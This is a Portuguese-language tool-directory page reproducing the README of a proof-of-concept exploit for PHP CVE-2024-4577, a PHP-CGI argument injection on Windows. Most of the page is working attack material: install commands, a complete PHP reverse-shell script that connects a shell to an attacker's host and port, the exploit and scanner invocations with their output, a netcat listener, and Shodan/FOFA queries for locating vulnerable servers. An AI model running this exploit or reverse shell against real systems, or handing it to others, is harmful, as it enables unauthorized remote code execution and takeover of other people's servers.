Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2024-4577-RCE-ATTACK — ATTACK PoC - PHP CVE-2024-4577 | Kitploit
Ferramentas/GitHubGitHub/bibo318/cve-2024-4577-rce-attack
Scanners de VulnerabilidadesExploraçãoExploração de Aplicações WebTestes de PenetraçãoRed TeamingDesenvolvimento de Payloads
GitHubbibo318/cve-2024-4577-rce-attack

CVE-2024-4577-RCE-ATTACK

ATTACK PoC - PHP CVE-2024-4577

Ver Repositório
53há 2 anosAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

PHP CVE-2024-4577-RCE-ATTACK-ATTACK

Medium Python Kali

📜 Descrição

Nas versões do PHP 8.1.* anteriores a 8.1.29, 8.2.* anteriores a 8.2.20 e 8.3.* anteriores a 8.3.8, ao usar Apache e PHP-CGI no Windows, se o sistema estiver configurado para usar determinadas páginas de código, o Windows pode usar o comportamento "Best Fit" para substituir caracteres na linha de comando fornecida às funções da API Win32. O módulo PHP CGI pode interpretar mal esses caracteres como opções do PHP, o que pode permitir que um usuário mal-intencionado passe opções para o binário do PHP em execução e, assim, revele o código-fonte de scripts, execute código PHP arbitrário no servidor, etc.

"O XAMPP é vulnerável na configuração padrão e podemos mirar o endpoint /php-cgi/php-cgi.exe. Para mirar um endpoint .php explícito (por exemplo, /index.php), o servidor deve ser configurado para executar scripts PHP no modo CGI."

📚 Índice

  • 📜 Descrição
  • 🛠️ Instalação
  • ⚙️ Uso
Baixar ferramenta
  • 💁 Referências
  • 🛠️ Instalação

    root@kitploit:~
    $ git clone https://github.com/bibo318/CVE-2024-4577-RCE-ATTACK.git
    $ cd CVE-2024-4577-RCE-ATTACK && pip install -r requirements.txt 
    

    ⚙️ Uso

    php-cge

    🤖 Configuração do shell reverso

    Payload PHP

    [!NOTE] Esta ferramenta demonstra táticas, técnicas e procedimentos (TTPs) reais. No entanto, esta carga útil específica não funciona neste caso. Modifique o shell.php para obter uma carga útil totalmente funcional.

    root@kitploit:~
    # rev_shell.php
    <?php
    // See http://pentestmonkey.net/tools/php-reverse-shell if you get stuck.
    
    set_time_limit (0);
    $VERSION = "1.0";
    $ip = 'xxxxxxxxxxx';  // CHANGE THIS
    $port = 9999;       // CHANGE THIS
    $chunk_size = 1400;
    $write_a = null;
    $error_a = null;
    $shell = 'uname -a; w; id; /bin/sh -i';
    $daemon = 0;
    $debug = 0;
    
    //
    // Daemonise ourself if possible to avoid zombies later
    //
    
    // pcntl_fork is hardly ever available, but will allow us to daemonise
    // our php process and avoid zombies.  Worth a try...
    if (function_exists('pcntl_fork')) {
    	// Fork and have the parent process exit
    	$pid = pcntl_fork();
    	
    	if ($pid == -1) {
    		printit("ERROR: Can't fork");
    		exit(1);
    	}
    	
    	if ($pid) {
    		exit(0);  // Parent exits
    	}
    
    	// Make the current process a session leader
    	// Will only succeed if we forked
    	if (posix_setsid() == -1) {
    		printit("Error: Can't setsid()");
    		exit(1);
    	}
    
    	$daemon = 1;
    } else {
    	printit("WARNING: Failed to daemonise.  This is quite common and not fatal.");
    }
    
    // Change to a safe directory
    chdir("/");
    
    // Remove any umask we inherited
    umask(0);
    
    //
    // Do the reverse shell...
    //
    
    // Open reverse connection
    $sock = fsockopen($ip, $port, $errno, $errstr, 30);
    if (!$sock) {
    	printit("$errstr ($errno)");
    	exit(1);
    }
    
    // Spawn shell process
    $descriptorspec = array(
       0 => array("pipe", "r"),  // stdin is a pipe that the child will read from
       1 => array("pipe", "w"),  // stdout is a pipe that the child will write to
       2 => array("pipe", "w")   // stderr is a pipe that the child will write to
    );
    
    $process = proc_open($shell, $descriptorspec, $pipes);
    
    if (!is_resource($process)) {
    	printit("ERROR: Can't spawn shell");
    	exit(1);
    }
    
    // Set everything to non-blocking
    // Reason: Occsionally reads will block, even though stream_select tells us they won't
    stream_set_blocking($pipes[0], 0);
    stream_set_blocking($pipes[1], 0);
    stream_set_blocking($pipes[2], 0);
    stream_set_blocking($sock, 0);
    
    printit("Successfully opened reverse shell to $ip:$port");
    
    while (1) {
    	// Check for end of TCP connection
    	if (feof($sock)) {
    		printit("ERROR: Shell connection terminated");
    		break;
    	}
    
    	// Check for end of STDOUT
    	if (feof($pipes[1])) {
    		printit("ERROR: Shell process terminated");
    		break;
    	}
    
    	// Wait until a command is end down $sock, or some
    	// command output is available on STDOUT or STDERR
    	$read_a = array($sock, $pipes[1], $pipes[2]);
    	$num_changed_sockets = stream_select($read_a, $write_a, $error_a, null);
    
    	// If we can read from the TCP socket, send
    	// data to process's STDIN
    	if (in_array($sock, $read_a)) {
    		if ($debug) printit("SOCK READ");
    		$input = fread($sock, $chunk_size);
    		if ($debug) printit("SOCK: $input");
    		fwrite($pipes[0], $input);
    	}
    
    	// If we can read from the process's STDOUT
    	// send data down tcp connection
    	if (in_array($pipes[1], $read_a)) {
    		if ($debug) printit("STDOUT READ");
    		$input = fread($pipes[1], $chunk_size);
    		if ($debug) printit("STDOUT: $input");
    		fwrite($sock, $input);
    	}
    
    	// If we can read from the process's STDERR
    	// send data down tcp connection
    	if (in_array($pipes[2], $read_a)) {
    		if ($debug) printit("STDERR READ");
    		$input = fread($pipes[2], $chunk_size);
    		if ($debug) printit("STDERR: $input");
    		fwrite($sock, $input);
    	}
    }
    
    fclose($sock);
    fclose($pipes[0]);
    fclose($pipes[1]);
    fclose($pipes[2]);
    proc_close($process);
    
    // Like print, but does nothing if we've daemonised ourself
    // (I can't figure out how to redirect STDOUT like a proper daemon)
    function printit ($string) {
    	if (!$daemon) {
    		print "$string\n";
    	}
    }
    
    ?> 
    

    🖥️ Escaneando servidor

    root@kitploit:~
    $ python3 CVE-2024-4577.py -s -t https://target.com/  
                                                       
    ,------. ,--.  ,--.,------.   ,-----.,--.   ,--.,------.        ,---.   ,--.  ,---.   ,---.         ,---.,-----.,-----.,-----. ,------.  ,-----.,------. 
    |  .--. '|  '--'  ||  .--. ' '  .--./ \  `.'  / |  .---',-----.'.-.  \ /    '.-.  \ /    |,-----. /    ||  .--''--,  /'--,  / |  .--. ''  .--./|  .---' 
    |  '--' ||  .--.  ||  '--' | |  |      \     /  |  `--, '-----' .-' .'|  ()  |.-' .'/  '  |'-----'/  '  |'--. `\ .'  /  .'  /  |  '--'.'|  |    |  `--,  
    |  | --' |  |  |  ||  | --'  '  '--'\   \   /   |  `---.       /   '-. \    //   '-.'--|  |       '--|  |.--'  //   /  /   /   |  |\  \ '  '--'\|  `---. 
    `--'     `--'  `--'`--'       `-----'    `-'    `------'       '-----'  `--' '-----'   `--'          `--'`----' `--'   `--'    `--' '--' `-----'`------'             
             Author: Demongod | CVE-2024-4577 | PoC and Scanner |                     
        
    [+] Target https://xxxx.com dễ bị tấn công bởi CVE-2024-4577
    

    🎯 Explorando servidor vulnerável

    root@kitploit:~
    $ python3 CVE-2024-4577.py -t http://example.com -e -p rev_shell.php
                                                       
    ,------. ,--.  ,--.,------.   ,-----.,--.   ,--.,------.        ,---.   ,--.  ,---.   ,---.         ,---.,-----.,-----.,-----. ,------.  ,-----.,------. 
    |  .--. '|  '--'  ||  .--. ' '  .--./ \  `.'  / |  .---',-----.'.-.  \ /    '.-.  \ /    |,-----. /    ||  .--''--,  /'--,  / |  .--. ''  .--./|  .---' 
    |  '--' ||  .--.  ||  '--' | |  |      \     /  |  `--, '-----' .-' .'|  ()  |.-' .'/  '  |'-----'/  '  |'--. `\ .'  /  .'  /  |  '--'.'|  |    |  `--,  
    |  | --' |  |  |  ||  | --'  '  '--'\   \   /   |  `---.       /   '-. \    //   '-.'--|  |       '--|  |.--'  //   /  /   /   |  |\  \ '  '--'\|  `---. 
    `--'     `--'  `--'`--'       `-----'    `-'    `------'       '-----'  `--' '-----'   `--'          `--'`----' `--'   `--'    `--' '--' `-----'`------'  
            Author: Demongod | CVE-2024-4577 | PoC and Scanner |
    
    [+] Khai thác thành công!
    

    👨🏻‍💻 Listener do Netcat

    root@kitploit:~
    $ nc -lvnp 9999
    

    🔍 Detecção de servidores vulneráveis

    • Shodan: server: PHP 8.1, server: PHP 8.2, server: PHP 8.3
    • FOFA: protocol="http" && header="X-Powered-By: PHP/8.1" || header="X-Powered-By: PHP/8.2" || header="X-Powered-By: PHP/8.3"

    💁 Referências

    • https://labs.watchtowr.com/no-way-php-strikes-again-cve-2024-4577
    • https://raw.githubusercontent.com/projectdiscovery/nuclei-templates/main/http/cves/2024/CVE-2024-4577.yaml
    • http://www.openwall.com/lists/oss-security/2024/06/07/1
    • https://raw.githubusercontent.com/rapid7/metasploit-framework/master/modules/exploits/windows/http/php_cgi_arg_injection_rce_cve_2024_4577.rb
    • https://www.php.net/ChangeLog-8.php#8.1.29
    • https://www.php.net/ChangeLog-8.php#8.2.20
    • https://www.php.net/ChangeLog-8.php#8.3.8

    ⚠️ Aviso de isenção de responsabilidade

    Esta ferramenta é fornecida apenas para fins educacionais e de pesquisa. O criador não se responsabiliza por qualquer uso indevido ou danos causados por esta ferramenta. Criar issue